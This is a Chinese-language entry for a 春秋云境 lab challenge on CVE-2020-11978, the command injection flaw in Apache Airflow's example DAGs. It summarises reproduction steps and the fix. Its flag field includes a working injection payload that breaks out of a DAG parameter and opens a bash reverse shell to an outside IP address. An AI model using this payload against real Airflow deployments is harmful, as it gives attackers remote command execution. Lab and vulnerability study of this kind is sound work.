CVE-2020-11978
| ID: | 14678 |
|---|---|
| 标题: | CVE-2020-11978 |
| 描述: | Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 Apache Airflow 1.10.10及之前版本中的 example DAGs存在命令注入漏洞。攻击者可利用该漏洞运行任意命令。 |
| 类型: | WEB |
| 网站: | 春秋云境 |
| 题目链接: | https://yunjing.ichunqiu.com/cvevip |
| 赛事: | 春秋云境 |
| 年度: | None |
| Flag值: | CVE-2020-11978是Apache Airflow命令注入漏洞,攻击者可通过触发示例DAG执行任意命令。复现步骤包括启动Vulhub环境、修改DAG配置触发命令注入,例如使用{"message":"'\";bash -i >& /dev/tcp/192.168.230.234/9999 0>&1;#"}反弹shell 2 3。修复建议为升级至1.10.10以上版本或禁用默认DAG。 |
| writeup: | https://blog.csdn.net/weixin_43847838/article/details/125349343 |